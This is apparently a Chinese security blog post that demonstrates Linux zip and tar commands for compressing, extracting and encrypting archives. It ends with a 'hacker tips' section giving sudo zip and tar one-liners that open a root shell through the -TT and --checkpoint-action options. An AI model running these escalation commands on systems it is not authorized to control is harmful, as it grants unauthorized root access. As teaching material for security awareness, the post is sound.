相比tar命令,更多人会熟悉zip命令,在linux下,其实tar命令更多一些,说到linux压缩,我们这边的测试领导就很自然而然的会使用tar而不是zip,尽管tar命令更长一些,而我更喜欢用zip,仅仅是因为zip命令更短。
ailx10
网络安全优秀回答者
网络安全硕士
去咨询
一般文件夹都是递归的,大娃套小娃,我们构造这样一个模拟数据,来演示zip和tar命令,结尾彩蛋给大家分享一下黑客小知识,通过zip、tar 进行主机提权~
模拟文件和文件夹
1、zip压缩和解压缩
zip -r 010.zip 010/
zip压缩
unzip 010.zip -d 020
zip解压缩
2、tar压缩和解压缩
tar cvf 010.tar.gz 010
tar压缩
tar xvf 010.tar.gz
tar解压缩
总的来说,linux下的压缩命令非常简单
3、zip加密压缩
zip -e 010.zip -r 010
zip加密压缩
4、zip提权(逐渐黑化)
mktemp -u (创建临时文件)
zip /tmp/tmp.TtmTT5XzbL /etc/hosts -T -TT 'sh #'
zip提权
mktemp -u
sudo zip /tmp/tmp.TtmTT5XzbL /etc/hosts -T -TT 'sh #'
zip提权
5、tar 提权(彻底黑化)
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
tar 提权
真的黑客
发布于 2022-09-19 21:41
